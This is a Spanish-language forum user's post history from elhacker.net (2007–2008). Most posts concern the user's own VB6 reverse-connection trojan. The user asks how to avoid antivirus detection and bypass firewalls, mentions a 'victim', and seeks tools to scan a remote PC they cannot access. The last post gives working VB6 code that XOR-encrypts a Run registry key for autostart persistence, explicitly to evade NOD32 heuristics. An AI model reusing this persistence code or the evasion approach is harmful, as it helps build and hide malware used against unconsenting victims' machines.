elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
10 Octubre 2008, 22:21  

Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7
1  Sistemas Operativos / GNU/Linux / Re: scanner de vulnerabilidades que corra sobre ubuntu linux?:S en: 17 Mayo 2008, 04:22
okaa gracias x todoo
estoi muy pollo todavia en esto de exploits y explotar vulnerabilidades, me voy a buscar una guia primero mejor xD
gracias x todo dnuevo ;)
2  Sistemas Operativos / GNU/Linux / Re: scanner de vulnerabilidades que corra sobre ubuntu linux?:S en: 17 Mayo 2008, 02:29
pero lo que necesito es hacer un test de vulnerabilidad del sistema remoto... nmap y netcat hasta donde yo se lo maximo que hacen es scanear puertos... y esa ventanita de ms-dos se llama shell remota porsiacaso xDDD
3  Sistemas Operativos / GNU/Linux / Re: scanner de vulnerabilidades que corra sobre ubuntu linux?:S en: 17 Mayo 2008, 02:07
graciaaaaas! no sabia que nmap escaneaba vulnerabilidades :S
voy a probarlo ahora ;)
pero netcat hasta donde yo se no escanea vulnerabilidades xD pero de todas maneras lo tengo hace rato, muy util
4  Sistemas Operativos / GNU/Linux / Re: scanner de vulnerabilidades que corra sobre ubuntu linux?:S en: 16 Mayo 2008, 23:36
pero con nessus no debo tener un username y password de la pc remota? eso entendi yo por lo menos :S necesito analizar un pc remoto que tiene windows xp, pero a este pc no tengo acceso
5  Sistemas Operativos / GNU/Linux / scanner de vulnerabilidades que corra sobre ubuntu linux?:S en: 16 Mayo 2008, 18:58
hola, necesito un scanner de vulnerabilidades que corra sobre ubuntu linux, me recomiendan alguno? necesito analizar en busca de vulnerabilidades un sistema remoto con que tiene windows xp
estuve probando emular el shadow security scanner (sss) con wine pero no me funciona muy bien que digamos :S
muchas gracias de antemano !
6  Seguridad Informática / Análisis y Diseño de Malware / Re: [?] Cactus Joiner 2.71 BETA Release (para BetaTesters) en: 14 Julio 2007, 19:11
wooow! realmente excelente!!!!!!!!
no he visto por ahora ningun fallo, por mi parte esta perfecto
7  Seguridad Informática / Hacking Básico / abrir puertos Router D-Link DI 604 ayuda! en: 30 Junio 2007, 01:38
estoy intentando ocupar mi troyano desde un pc con un router d-link di 604, he buscadomuchas guias pero no me a funcionado nada... alguine me ayuda porfiss???
GraciaS!
8  Seguridad Informática / Análisis y Diseño de Malware / Re: virustotal.com??? en: 29 Junio 2007, 01:40
muchas gracias! me quedo con el kims no me quiero arriesgar con virustotal.com me huele mal xD
le paso el kims a mi servidor que dicen ser detectado y me dice que no tiene nada... no sera que le salto un firewall??? es de conexion inversa.. pero si controla lo que sale del pc seria posible... si fue asi, como hago para saltarme estos firewalls???
PD: el servidor de http://conexion-inversa-eng.no-ip.org:8082/kims.php                     
9  Seguridad Informática / Análisis y Diseño de Malware / virustotal.com??? en: 28 Junio 2007, 03:19
wenassS a to2
termine con un troyano que llevo haciendo desde hace meses en vb6
la cosa es que necesito comprobar si es 100% indetectable y escuche sobre estos online AV, escuche sobre www.virustotal.com y que al parecer era bueno..
mi pregunta es
es conveniente enviar my servidor a ese av???, no corro riesgo en que despues todos los av comunes y corrientes me lo detecte??? tambien tiene una opcion para no distribuir a compañias de av.. pero no se si confiar 100%
que opinan uds????
Gracias de antemano
10  Programación / Programación VB / Re: Problema con Avast ¬¬ en: 27 Junio 2007, 02:30
las funciones estan en un timer con intervalo 20, a mi no me lo detecta, es una victima que tengo que dice tener el avast
y la funcion que ocupo para copiar es la filecopy y copia a la carpeta d windows
windows = Environ("windir")
que se puede hacer?
(las claves de para el registro ya estan encriptadas xD)
11  Programación / Programación VB / Re: Problema con Avast ¬¬ en: 26 Junio 2007, 00:19
no se en que momento... pero si saco lo de la copia, ya no lo detecta.. el problema es que es una funcion que necesito mucho :S
12  Programación / Programación VB / Problema con Avast ¬¬ en: 26 Junio 2007, 00:00
no se porque el avast me empezo a detectar mi troyanito =(
esta hecho en vb y lo hice yo, ningun otro av lo detecta solo el nod
parece que es por que se copia a la carpeta de windows i se renombra, ademas de eso crea un programa aparte que chekea si esta iniciado el proceso, si no lo esta lo inicia, todo esto en un timer
tambien tengo encriptada la clave del registro..
que puedo hacer?
publico el code para que me ayuden en que parte puede estar detectandolo???
GraciaS de AnteManO!
13  Programación / Programación VB / Re: Detectar si se repite una combinacion.... en: 22 Junio 2007, 22:11
me da error al poner el componente del richtextbox...=S no lo habia usado nunca antes
me tira el siguiente error
No se encontro la informacion de licencia para este componente. No tiene una licencia apropiada para usar esta funcionalidad en el entorno de diseño.
14  Programación / Programación VB / Detectar si se repite una combinacion.... en: 20 Junio 2007, 00:47
Primero que nada este code no es para mi... me lo pidio un amigo que en realidad no entiendo mucho lo que quiere hacer... al parecer es para descifrar un codigo del zodiaco.. algo así entendi.. pero bueno aca va la pregunta

lo que quiero hacer es por ejemplo tener un textbox, y en ese textbox se escribiria un textto como este con varios signos
1asd^ç*da!7//asd?^ç*??213¡¡¡
la idea es que al apretar un command button el textbox marque todas las combinaciones repeitdas de 3 caracteres, por ejemplo aca se repite la combinacion de 3 caracteres ^ç* entonces el textbox deberia marcar con otro color el ^ç*
me expplique bien???
es posible hacer esto con vb6???
Gracias de antemano!!!! :D
15  Programación / Programación VB / Re: Auto ejecutar un programa al iniciar window en: 20 Junio 2007, 00:41
Código:
dim Windows = environ("windir") 'la variable windows es igual a la carpeta donde este el windows
On Error GoTo fallo'este code lo pones por ejemplo en form_load
Set Clave = CreateObject("WScript.shell")
Deb = Desencriptar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Lkftt")
Clave.regwrite Deb, Windows & "\jushed.exe" 'jushed.exe seria el nombre de la aplicacion que quieres que se inicie
fallo:

Private Function Desencriptar(j)
On Error Resume Next
For R = 1 To Len(j)
Desencriptar = Desencriptar & Chr(Asc(Mid(j, R, 1)) Xor 7)
Next
End Function

Aca tiene el code para agregar la cadena al registro y de paso encriptarla, para no tener problemas con la heuristica como por ejemplo con el nod32
este code no es mio
todos los creditos a vivachapas!
Páginas: [1] 2 3 4 5 6 7

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.